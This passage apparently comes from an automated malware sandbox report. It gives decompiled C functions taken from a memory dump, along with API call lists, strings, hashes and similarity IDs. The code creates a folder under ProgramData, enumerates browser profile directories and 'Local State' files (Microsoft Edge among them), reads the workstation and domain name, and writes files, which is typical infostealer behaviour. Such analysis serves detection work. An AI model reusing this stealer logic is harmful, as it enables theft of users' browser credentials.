				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t170;

				_t135 = __esi;
				_t134 = __edi;
				_t69 = __ebx;
				E004091C0("C:\\ProgramData\\734573140483756", 0, 0x104);
				 *0x4328c4("C:\\ProgramData\\734573140483756", _a4);
				_t70 =  *0x432190; // 0xc17678
				_t102 =  *0x43211c; // 0xc17738
				_t5 =  *0x43211c; // 0xc17738
				E00424E20(__ebx, __edi, __esi, _t170, _t5, _t102, _t70); // executed
				_t71 =  *0x4322e4; // 0xc176c0
				_t103 =  *0x432680; // 0xc17600
				_t7 =  *0x432680; // 0xc17600
				E00424E20(__ebx, __edi, __esi, _t170, _t7, _t103, _t71); // executed
				_t72 =  *0x4325e8; // 0xc17690
				_t104 =  *0x432610; // 0xc181e0
				_t9 =  *0x432620; // 0xc177e0
				E00424E20(_t69, _t134, _t135, _t170, _t9, _t104, _t72); // executed
				_t73 =  *0x4325e8; // 0xc17690
				_t105 =  *0x432290; // 0xc161a8
				_t11 =  *0x432344; // 0xc177b0
				E00424E20(_t69, _t134, _t135, _t170, _t11, _t105, _t73); // executed
				_t74 =  *0x4325e8; // 0xc17690
				_t106 =  *0x432328; // 0xc15ff0
				_t13 =  *0x432194; // 0xc175a0
				E00424E20(_t69, _t134, _t135, _t170, _t13, _t106, _t74); // executed
				_t75 =  *0x43263c; // 0xc182a0
				_t107 =  *0x432144; // 0xc17708
				_t15 =  *0x432144; // 0xc17708
				E00424E20(_t69, _t134, _t135, _t170, _t15, _t107, _t75); // executed
				_t76 =  *0x432384; // 0xc18020
				_t108 =  *0x432144; // 0xc17708
				_t17 =  *0x432144; // 0xc17708
				E00424E20(_t69, _t134, _t135, _t170, _t17, _t108, _t76); // executed
				_t77 =  *0x432464; // 0xc17720
				_t109 =  *0x432478; // 0xc161d0
				_t19 =  *0x432144; // 0xc17708
				E00424E20(_t69, _t134, _t135, _t170, _t19, _t109, _t77); // executed
				_t78 =  *0x4325f8; // 0xc176f0
				_t110 =  *0x432478; // 0xc161d0
				_t21 =  *0x432144; // 0xc17708
				E00424E20(_t69, _t134, _t135, _t170, _t21, _t110, _t78); // executed
				_t79 =  *0x432614; // 0xc17888
				_t111 =  *0x432478; // 0xc161d0
				_t23 =  *0x432144; // 0xc17708
				E00424E20(_t69, _t134, _t135, _t170, _t23, _t111, _t79); // executed
				_t80 =  *0x4324e8; // 0xc18140
				_t112 =  *0x432430; // 0xc17828
				_t25 =  *0x432430; // 0xc17828
				E00424E20(_t69, _t134, _t135, _t170, _t25, _t112, _t80); // executed
				_t81 =  *0x432190; // 0xc17678
				_t113 =  *0x4326a4; // 0xc17660
				_t27 =  *0x4326a4; // 0xc17660
				E00424E20(_t69, _t134, _t135, _t170, _t27, _t113, _t81); // executed
				_t82 =  *0x432190; // 0xc17678
				_t114 =  *0x432630; // 0xc17840
				_t29 =  *0x432630; // 0xc17840
				E00424E20(_t69, _t134, _t135, _t170, _t29, _t114, _t82); // executed
				_t83 =  *0x432190; // 0xc17678
				_t115 =  *0x4323e0; // 0xc17750
				_t31 =  *0x4323e0; // 0xc17750
				E00424E20(_t69, _t134, _t135, _t170, _t31, _t115, _t83); // executed
				_t84 =  *0x432190; // 0xc17678
				_t116 =  *0x43269c; // 0xc17630
				_t33 =  *0x43269c; // 0xc17630
				E00424E20(_t69, _t134, _t135, _t170, _t33, _t116, _t84); // executed
				_t85 =  *0x432190; // 0xc17678
				_t117 =  *0x432510; // 0xc17648
				_t35 =  *0x432510; // 0xc17648
				E00424E20(_t69, _t134, _t135, _t170, _t35, _t117, _t85); // executed
				_t86 =  *0x432190; // 0xc17678
				_t118 =  *0x432484; // 0xc176a8
				_t37 =  *0x432484; // 0xc176a8
				E00424E20(_t69, _t134, _t135, _t170, _t37, _t118, _t86); // executed
				_t87 =  *0x432190; // 0xc17678
				_t119 =  *0x432698; // 0xc17768
				_t39 =  *0x432698; // 0xc17768
				E00424E20(_t69, _t134, _t135, _t170, _t39, _t119, _t87); // executed
				_t88 =  *0x432190; // 0xc17678
				_t120 =  *0x432518; // 0xc17798
				_t41 =  *0x432518; // 0xc17798
				E00424E20(_t69, _t134, _t135, _t170, _t41, _t120, _t88); // executed
				_t89 =  *0x432190; // 0xc17678
				_t121 =  *0x43234c; // 0xc17780
				_t43 =  *0x43234c; // 0xc17780
				E00424E20(_t69, _t134, _t135, _t170, _t43, _t121, _t89); // executed
				_t90 =  *0x432190; // 0xc17678
				_t122 =  *0x432238; // 0xc177c8
				_t45 =  *0x432238; // 0xc177c8
				E00424E20(_t69, _t134, _t135, _t170, _t45, _t122, _t90); // executed
				_t91 =  *0x432190; // 0xc17678
				_t123 =  *0x43216c; // 0xc17fe0
				_t47 =  *0x432414; // 0xc177f8
				E00424E20(_t69, _t134, _t135, _t170, _t47, _t123, _t91); // executed
				_t92 =  *0x432190; // 0xc17678
				_t124 =  *0x43268c; // 0xc18060
				_t49 =  *0x43268c; // 0xc18060
				E00424E20(_t69, _t134, _t135, _t170, _t49, _t124, _t92); // executed
				_t93 =  *0x432190; // 0xc17678
				_t125 =  *0x432654; // 0xc17810
				_t51 =  *0x432654; // 0xc17810
				E00424E20(_t69, _t134, _t135, _t170, _t51, _t125, _t93); // executed
				_t94 =  *0x432190; // 0xc17678
				_t126 =  *0x4320c0; // 0xc175b8
				_t53 =  *0x4320c0; // 0xc175b8
				E00424E20(_t69, _t134, _t135, _t170, _t53, _t126, _t94); // executed
				_t95 =  *0x432190; // 0xc17678
				_t127 =  *0x4321ac; // 0xc17858
				_t55 =  *0x4321ac; // 0xc17858
				E00424E20(_t69, _t134, _t135, _t170, _t55, _t127, _t95); // executed
				_t96 =  *0x432190; // 0xc17678
				_t128 =  *0x432530; // 0xc17870
				_t57 =  *0x432530; // 0xc17870
				E00424E20(_t69, _t134, _t135, _t170, _t57, _t128, _t96); // executed
				_t97 =  *0x432190; // 0xc17678
				_t129 =  *0x432380; // 0xc175d0
				_t59 =  *0x432380; // 0xc175d0
				E00424E20(_t69, _t134, _t135, _t170, _t59, _t129, _t97); // executed
				_t98 =  *0x432190; // 0xc17678
				_t130 =  *0x43209c; // 0xc175e8
				_t61 =  *0x43209c; // 0xc175e8
				E00424E20(_t69, _t134, _t135, _t170, _t61, _t130, _t98); // executed
				_t99 =  *0x432190; // 0xc17678
				_t131 =  *0x4320cc; // 0xc178e8
				_t63 =  *0x4320cc; // 0xc178e8
				E00424E20(_t69, _t134, _t135, _t170, _t63, _t131, _t99); // executed
				_t100 =  *0x432190; // 0xc17678
				_t132 =  *0x432180; // 0xc178d0
				_t65 =  *0x432180; // 0xc178d0
				E00424E20(_t69, _t134, _t135, _t170, _t65, _t132, _t100); // executed
				_t101 =  *0x4321dc; // 0xc17158
				_t133 =  *0x432130; // 0xc182f8
				_t67 =  *0x432300; // 0xc17930
				_t68 = E00424E20(_t69, _t134, _t135, _t170, _t67, _t133, _t101); // executed
				return _t68;
			}

0x00424f00
0x00424f00
0x00424f00
0x00424f0f
0x00424f20
0x00424f26
0x00424f2d
0x00424f34
0x00424f3a
0x00424f42
0x00424f49
0x00424f50
0x00424f56
0x00424f5e
0x00424f65
0x00424f6c
0x00424f72
0x00424f7a
0x00424f81
0x00424f88
0x00424f8e
0x00424f96
0x00424f9d
0x00424fa4
0x00424faa
0x00424fb2
0x00424fb9
0x00424fc0
0x00424fc6
0x00424fce
0x00424fd5
0x00424fdc
0x00424fe2
0x00424fea
0x00424ff1
0x00424ff8
0x00424ffe
0x00425006
0x0042500d
0x00425014
0x0042501a
0x00425022
0x00425029
0x00425030
0x00425036
0x0042503e
0x00425045
0x0042504c
0x00425052
0x0042505a
0x00425061
0x00425068
0x0042506e
0x00425076
0x0042507d
0x00425084
0x0042508a
0x00425092
0x00425099
0x004250a0
0x004250a6
0x004250ae
0x004250b5
0x004250bc
0x004250c2
0x004250ca
0x004250d1
0x004250d8
0x004250de
0x004250e6
0x004250ed
0x004250f4
0x004250fa
0x00425102
0x00425109
0x00425110
0x00425116
0x0042511e
0x00425125
0x0042512c
0x00425132
0x0042513a
0x00425141
0x00425148
0x0042514e
0x00425156
0x0042515d
0x00425164
0x0042516a
0x00425172
0x00425179
0x00425180
0x00425186
0x0042518e
0x00425195
0x0042519c
0x004251a2
0x004251aa
0x004251b1
0x004251b8
0x004251be
0x004251c6
0x004251cd
0x004251d4
0x004251da
0x004251e2
0x004251e9
0x004251f0
0x004251f6
0x004251fe
0x00425205
0x0042520c
0x00425212
0x0042521a
0x00425221
0x00425228
0x0042522e
0x00425236
0x0042523d
0x00425244
0x0042524a
0x00425252
0x00425259
0x00425260
0x00425266
0x0042526e
0x00425275
0x0042527c
0x00425282
0x0042528a
0x00425291
0x00425298
0x0042529e
0x004252a7

APIs

_memset.LIBCMT ref: 00424F0F
lstrcat.KERNEL32(C:\\ProgramData\\734573140483756,004210BE), ref: 00424F20

Part of subcall function 00424E20: _memset.LIBCMT ref: 00424E41
Part of subcall function 00424E20: lstrcat.KERNEL32(?,00C17738), ref: 00424E65
Part of subcall function 00424E20: _memset.LIBCMT ref: 00424E79
Part of subcall function 00424E20: lstrcat.KERNEL32(?,C:\\ProgramData\\734573140483756), ref: 00424E8D
Part of subcall function 00424E20: lstrcat.KERNEL32(?,00C176D8), ref: 00424EA0
Part of subcall function 00424E20: lstrcat.KERNEL32(?,00C17738), ref: 00424EB1
Part of subcall function 00424E20: CreateDirectoryA.KERNEL32(?,00000000), ref: 00424EC0

Strings

C:\\ProgramData\\734573140483756, xrefs: 00424F0A, 00424F1B

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$CreateDirectory
String ID: C:\\ProgramData\\734573140483756
API String ID: 2116157328-3356951166
Opcode ID: 68618ae334612c316fc4654c644ec3a2389e9793a72b7eed8bfea142103e70cb
Instruction ID: 6916c144791a522f3d991c651c15dc8eb940c2e24fba88255345f40e4dd8dd62
Opcode Fuzzy Hash: 68618ae334612c316fc4654c644ec3a2389e9793a72b7eed8bfea142103e70cb
Instruction Fuzzy Hash: D1A1BFB2A10510BBDB08DB99FF95C1633AAB7DC304714613CF708C7275EAB4A9158BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0041EBD0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0041EBD0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				char _v275;
				char _v276;
				intOrPtr _v280;
				void* __ebp;
				signed int _t8;
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t36;
				intOrPtr _t38;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				signed int _t114;
				void* _t115;
				void* _t117;

				_t113 = __esi;
				_t112 = __edi;
				_t68 = __ebx;
				_t8 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t8 ^ _t114;
				_v276 = 0;
				E004091C0( &_v275, 0, 0x103);
				_t69 =  *0x4321d0; // 0xc110d8
				_t92 =  *0x4325d0; // 0xc16c20
				_t12 = E004055AB(_t92, _t69); // executed
				_t117 = _t115 + 0x14;
				_v280 = _t12;
				_t148 = _v280;
				if(_v280 != 0) {
					_push(_v280);
					E00405EA3(__ebx, _t92, __edi, __esi, _t148);
					_t117 = _t117 + 4; // executed
				}
				E0041BEE0(_t68); // executed
				E0041C810();
				_t70 =  *0x4323f8; // 0xc16b90
				_t93 =  *0x4324f4; // 0xc160e0
				E0041EAB0(_t68, _t112, _t113, _t148, _t93, _t70); // executed
				_t16 =  *0x432200; // 0xc16980
				_t71 =  *0x4325e4; // 0xc16470
				E0041EAB0(_t68, _t112, _t113, _t148, _t71, _t16); // executed
				_t94 =  *0x432288; // 0xc16818
				_t18 =  *0x43253c; // 0xc162b0
				E0041EAB0(_t68, _t112, _t113, _t148, _t18, _t94); // executed
				_t72 =  *0x4324b8; // 0xc16768
				_t95 =  *0x43246c; // 0xc164f0
				E0041EAB0(_t68, _t112, _t113, _t148, _t95, _t72); // executed
				_t21 =  *0x4323fc; // 0xc16748
				_t73 =  *0x432670; // 0xc16430
				E0041EAB0(_t68, _t112, _t113, _t148, _t73, _t21); // executed
				_t96 =  *0x43254c; // 0xc16868
				_t23 =  *0x43230c; // 0xc16650
				E0041EAB0(_t68, _t112, _t113, _t148, _t23, _t96); // executed
				_t74 =  *0x432640; // 0xc16a28
				_t97 =  *0x432684; // 0xc16090
				E0041EAB0(_t68, _t112, _t113, _t148, _t97, _t74); // executed
				_t26 =  *0x432268; // 0xc168a8
				_t75 =  *0x432324; // 0xc16510
				E0041EAB0(_t68, _t112, _t113, _t148, _t75, _t26); // executed
				_t98 =  *0x4323c4; // 0xc16908
				_t28 =  *0x432350; // 0xc16530
				E0041EAB0(_t68, _t112, _t113, _t148, _t28, _t98); // executed
				_t76 =  *0x4320b4; // 0xc16848
				_t99 =  *0x4321bc; // 0xc16610
				E0041EAB0(_t68, _t112, _t113, _t148, _t99, _t76); // executed
				_t31 =  *0x432598; // 0xc167d8
				_t77 =  *0x4324dc; // 0xc16e78
				E0041EAB0(_t68, _t112, _t113, _t148, _t77, _t31); // executed
				_t100 =  *0x432410; // 0xc16808
				_t33 =  *0x432320; // 0xc16550
				E0041EAB0(_t68, _t112, _t113, _t148, _t33, _t100); // executed
				_t78 =  *0x4320fc; // 0xc16a70
				_t101 =  *0x43231c; // 0xc15fc8
				E0041EAB0(_t68, _t112, _t113, _t148, _t101, _t78); // executed
				_t36 =  *0x43240c; // 0xc169c8
				_t79 =  *0x43223c; // 0xc15eb0
				E0041EAB0(_t68, _t112, _t113, _t148, _t79, _t36); // executed
				_t102 =  *0x4324d8; // 0xc16998
				_t38 =  *0x43235c; // 0xc16630
				E0041EAB0(_t68, _t112, _t113, _t148, _t38, _t102); // executed
				_t80 =  *0x432638; // 0xc16858
				_t103 =  *0x4325b8; // 0xc15f28
				E0041EAB0(_t68, _t112, _t113, _t148, _t103, _t80); // executed
				_t41 =  *0x432148; // 0xc16590
				_t81 =  *0x432358; // 0xc160b8
				E0041EAB0(_t68, _t112, _t113, _t148, _t81, _t41); // executed
				_t104 =  *0x432660; // 0xc16698
				_t43 =  *0x43260c; // 0xc165b0
				E0041EAB0(_t68, _t112, _t113, _t148, _t43, _t104); // executed
				E0041EAB0(_t68, _t112, _t113, _t148, "\\Microsoft\\Edge\\User Data\\", "Microsoft Edge"); // executed
				_t82 =  *0x432168; // 0xc16ab8
				_t105 =  *0x432128; // 0xc15ed8
				E0041EAB0(_t68, _t112, _t113, _t148, _t105, _t82); // executed
				_t47 =  *0x4323d0; // 0xc166a8
				_t83 =  *0x4326e0; // 0xc16f30
				E0041EAB0(_t68, _t112, _t113, _t148, _t83, _t47); // executed
				_t106 =  *0x432370; // 0xc16738
				_t49 =  *0x432368; // 0xc16e40
				E0041E990(_t68, _t112, _t113, _t148, _t49, _t106); // executed
				_t84 =  *0x432334; // 0xc169f8
				_t107 =  *0x432260; // 0xc16130
				E0041D650(_t68, _t112, _t113, _t148, _t107, _t84); // executed
				_t52 =  *0x4320b0; // 0xc16ad0
				_t85 =  *0x43251c; // 0xc16eb0
				E0041D650(_t68, _t112, _t113, _t148, _t85, _t52); // executed
				_t108 =  *0x4323b4; // 0xc16ae8
				_t54 =  *0x432444; // 0xc162d0
				E0041D650(_t68, _t112, _t113, _t148, _t54, _t108); // executed
				_t86 =  *0x4322a8; // 0xc16b00
				_t109 =  *0x432284; // 0xc16ee8
				E0041D650(_t68, _t112, _t113, _t148, _t109, _t86); // executed
				_t57 =  *0x432514; // 0xc16b48
				_t87 =  *0x4321c0; // 0xc16fd0
				E0041D650(_t68, _t112, _t113, _t148, _t87, _t57); // executed
				_t110 =  *0x4320f0; // 0xc166b8
				_t59 =  *0x432434; // 0xc16018
				E0041D650(_t68, _t112, _t113, _t148, _t59, _t110); // executed
				_t88 =  *0x432208; // 0xc16778
				_t111 =  *0x432228; // 0xc16b78
				E0041D650(_t68, _t112, _t113, _t148, _t111, _t88); // executed
				_t62 =  *0x432248; // 0xc16b30
				_t89 =  *0x4323b0; // 0xc15f00
				E0041D650(_t68, _t112, _t113, _t148, _t89, _t62); // executed
				_t64 = E0041C670(); // executed
				return E00404354(_t64, _t68, _v8 ^ _t114, _t111, _t112, _t113);
			}

0x0041ebd0
0x0041ebd0
0x0041ebd0
0x0041ebd9
0x0041ebe0
0x0041ebe3
0x0041ebf8
0x0041ec00
0x0041ec07
0x0041ec0e
0x0041ec13
0x0041ec16
0x0041ec1c
0x0041ec23
0x0041ec2b
0x0041ec2c
0x0041ec31
0x0041ec31
0x0041ec34
0x0041ec39
0x0041ec3e
0x0041ec45
0x0041ec4c
0x0041ec54
0x0041ec5a
0x0041ec61
0x0041ec69
0x0041ec70
0x0041ec76
0x0041ec7e
0x0041ec85
0x0041ec8c
0x0041ec94
0x0041ec9a
0x0041eca1
0x0041eca9
0x0041ecb0
0x0041ecb6
0x0041ecbe
0x0041ecc5
0x0041eccc
0x0041ecd4
0x0041ecda
0x0041ece1
0x0041ece9
0x0041ecf0
0x0041ecf6
0x0041ecfe
0x0041ed05
0x0041ed0c
0x0041ed14
0x0041ed1a
0x0041ed21
0x0041ed29
0x0041ed30
0x0041ed36
0x0041ed3e
0x0041ed45
0x0041ed4c
0x0041ed54
0x0041ed5a
0x0041ed61
0x0041ed69
0x0041ed70
0x0041ed76
0x0041ed7e
0x0041ed85
0x0041ed8c
0x0041ed94
0x0041ed9a
0x0041eda1
0x0041eda9
0x0041edb0
0x0041edb6
0x0041edc8
0x0041edd0
0x0041edd7
0x0041edde
0x0041ede6
0x0041edec
0x0041edf3
0x0041edfb
0x0041ee02
0x0041ee08
0x0041ee10
0x0041ee17
0x0041ee1e
0x0041ee26
0x0041ee2c
0x0041ee33
0x0041ee3b
0x0041ee42
0x0041ee48
0x0041ee50
0x0041ee57
0x0041ee5e
0x0041ee66
0x0041ee6c
0x0041ee73
0x0041ee7b
0x0041ee82
0x0041ee88
0x0041ee90
0x0041ee97
0x0041ee9e
0x0041eea6
0x0041eeac
0x0041eeb3
0x0041eebb
0x0041eecd

APIs

_memset.LIBCMT ref: 0041EBF8

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

Part of subcall function 0041EAB0: _memset.LIBCMT ref: 0041EADF
Part of subcall function 0041EAB0: lstrcat.KERNEL32(?,00000000), ref: 0041EB03
Part of subcall function 0041EAB0: _memset.LIBCMT ref: 0041EB17
Part of subcall function 0041EAB0: lstrcat.KERNEL32(?,?), ref: 0041EB2D
Part of subcall function 0041EAB0: lstrcat.KERNEL32(?,\Local State), ref: 0041EB3F

Part of subcall function 0041E990: _memset.LIBCMT ref: 0041E9BF
Part of subcall function 0041E990: lstrcat.KERNEL32(?,00000000), ref: 0041E9E3
Part of subcall function 0041E990: _memset.LIBCMT ref: 0041E9F7
Part of subcall function 0041E990: lstrcat.KERNEL32(?,?), ref: 0041EA0D
Part of subcall function 0041E990: lstrcat.KERNEL32(?,\Local State), ref: 0041EA1F

Part of subcall function 0041D650: _memset.LIBCMT ref: 0041D671
Part of subcall function 0041D650: _memset.LIBCMT ref: 0041D687
Part of subcall function 0041D650: lstrcat.KERNEL32(?,?), ref: 0041D6AB
Part of subcall function 0041D650: lstrcat.KERNEL32(?,?), ref: 0041D6BF
Part of subcall function 0041D650: lstrcat.KERNEL32(?,00C16330), ref: 0041D6D3

Part of subcall function 0041C670: FreeLibrary.KERNEL32(60900000), ref: 0041C679

Strings

Microsoft Edge, xrefs: 0041EDBE
\Microsoft\Edge\User Data\, xrefs: 0041EDC3

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$FreeLibrary__fsopen
String ID: Microsoft Edge$\Microsoft\Edge\User Data\
API String ID: 620465251-1389121604
Opcode ID: 38802b40fbcb17c391508f29b6d8f21a50793d1d3cb106a7df531d61abcaaade
Instruction ID: 2d2fb931b9ae42665d291fc59a7f3fa147f8e89296656bc41511a520b111f3b3
Opcode Fuzzy Hash: 38802b40fbcb17c391508f29b6d8f21a50793d1d3cb106a7df531d61abcaaade
Instruction Fuzzy Hash: F97168F6910100ABC304EBA5FE92DAB3379BB5C309B04553DFA0993262E679E544CB7D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B500, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041B500() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char* _t11;

				_v16 = 0x64;
				_v20 = 0;
				_v12 = 0;
				_t11 =  &_v20;
				__imp__NetWkstaGetInfo(_v12, _v16, _t11); // executed
				_v8 = _t11;
				if(_v8 != 0) {
					return "Unknown";
				}
				return E0041A160( *((intOrPtr*)(_v20 + 8)));
			}

0x0041b506
0x0041b50d
0x0041b514
0x0041b51b
0x0041b527
0x0041b52d
0x0041b534
0x00000000
0x0041b549
0x00000000

APIs

NetWkstaGetInfo.NETAPI32(00000000,00000064,00000000), ref: 0041B527

Part of subcall function 0041A160: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A1B2
Part of subcall function 0041A160: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0041A1E8

Strings

Unknown, xrefs: 0041B549
d, xrefs: 0041B506

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$InfoWksta
String ID: Unknown$d
API String ID: 825033016-3021344351
Opcode ID: dab486e043888457c44b747f981cab89ced7394723cfab24a07cdd0821c44d13
Instruction ID: 0cc9feaee1bb4248ef5061c996108ea8a110c275892f2931b12f92f325475970
Opcode Fuzzy Hash: dab486e043888457c44b747f981cab89ced7394723cfab24a07cdd0821c44d13
Instruction Fuzzy Hash: 19F058B4D0420CEBCB00DF94E845BEEBBB9EB08308F00859AE40597240D7799A55CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0041B570, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041B570() {
				intOrPtr _v8;
				char _v280;
				char* _t8;

				_t8 =  &_v280;
				__imp__DsRoleGetPrimaryDomainInformation(0, 1, _t8); // executed
				_v8 = _t8;
				if(_v8 == 0) {
					if( *((intOrPtr*)(_v280 + 0xc)) != 0) {
						return E0041A160( *((intOrPtr*)(_v280 + 0xc)));
					}
					return "Unknown";
				}
				return "Unknown";
			}

0x0041b579
0x0041b584
0x0041b58a
0x0041b591
0x0041b5a4
0x00000000
0x0041b5be
0x00000000
0x0041b5a6
0x00000000

APIs

DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?), ref: 0041B584

Strings

Unknown, xrefs: 0041B5A6
Unknown, xrefs: 0041B593

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DomainInformationPrimaryRole
String ID: Unknown$Unknown
API String ID: 2855586375-3288453820
Opcode ID: 8bf194b5eb0fff4c22011f0aa6ca56092ce4aafcdf5e959ef6ee53560e78e9d5
Instruction ID: 994e9e5a79c761b6cce28c5c30ff8c00c73be8f9ebb7f73b9366f8b68f0dda91
Opcode Fuzzy Hash: 8bf194b5eb0fff4c22011f0aa6ca56092ce4aafcdf5e959ef6ee53560e78e9d5
Instruction Fuzzy Hash: 1FF0A070A0410CEBEB10DB50E9067E5B77AEB04709F4082E6E90997380D3799D868BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00417880, Relevance: 4.6, APIs: 3, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417880(intOrPtr __ecx) {
				void* _v8;
				intOrPtr _v12;
				void* _t45;

				_v12 = __ecx;
				_v8 = 0;
				if(( *(_v12 + 0x2c) & 0x000000ff) == 0) {
					_t45 = E004176C0(_v12); // executed
					_v8 = _t45;
				}
				 *(_v12 + 0x2c) = 1;
				if( *(_v12 + 0x20) != 0 &&  *(_v12 + 0xc) != 0) {
					UnmapViewOfFile( *(_v12 + 0x20));
				}
				 *(_v12 + 0x20) = 0;
				if( *(_v12 + 0xc) != 0) {
					CloseHandle( *(_v12 + 0xc));
				}
				 *(_v12 + 0xc) = 0;
				if( *(_v12 + 4) != 0 && ( *(_v12 + 8) & 0x000000ff) != 0) {
					CloseHandle( *(_v12 + 4));
				}
				 *(_v12 + 4) = 0;
				 *(_v12 + 8) = 0;
				return _v8;
			}

0x00417886
0x00417889
0x00417899
0x0041789e
0x004178a3
0x004178a3
0x004178a9
0x004178b4
0x004178c6
0x004178c6
0x004178cf
0x004178dd
0x004178e6
0x004178e6
0x004178ef
0x004178fd
0x00417911
0x00417911
0x0041791a
0x00417924
0x0041792e

APIs

UnmapViewOfFile.KERNEL32(00000000), ref: 004178C6
CloseHandle.KERNEL32(00000000), ref: 004178E6
CloseHandle.KERNEL32(00000000), ref: 00417911

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 52af9201f7e8f3cf6b307c72bd33e491c912dbb0bb0b919b19dd72c1d6efd311
Instruction ID: 11a27e91ac3b3ffdcce7ec8384e8c2b627b78d682cb19b9dd0d09749feb03add
Opcode Fuzzy Hash: 52af9201f7e8f3cf6b307c72bd33e491c912dbb0bb0b919b19dd72c1d6efd311
Instruction Fuzzy Hash: 8921E474A04208EFDB14DF94C498B9EBFB1BB48315F1882D9D8845B391C739EA89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00421440, Relevance: 4.5, APIs: 3, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00421440(intOrPtr __ecx, CHAR* _a4) {
				long _v8;
				void* _v12;
				intOrPtr _v16;
				void* _t19;

				_v16 = __ecx;
				if( *(_v16 + 0x28) == 0 ||  *(_v16 + 0x34) == 0) {
					return 0;
				} else {
					_t19 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0x80, 0); // executed
					_v12 = _t19;
					if(_v12 != 0xffffffff) {
						_v8 = 0;
						WriteFile(_v12,  *(_v16 + 0x28),  *(_v16 + 0x34),  &_v8, 0); // executed
						CloseHandle(_v12);
						return 1;
					}
					return 0;
				}
			}

0x00421446
0x00421450
0x00000000
0x0042145f
0x00421475
0x0042147b
0x00421482
0x00421488
0x004214a7
0x004214b1
0x00000000
0x004214b7
0x00000000
0x00421484

APIs

CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,3B2BC12F), ref: 00421475
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 004214A7
CloseHandle.KERNEL32(000000FF), ref: 004214B1

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 06d5e509e48cf5e6f34cfc1713bf35c5c0cec532718b5c270ec26c1f8e4708b8
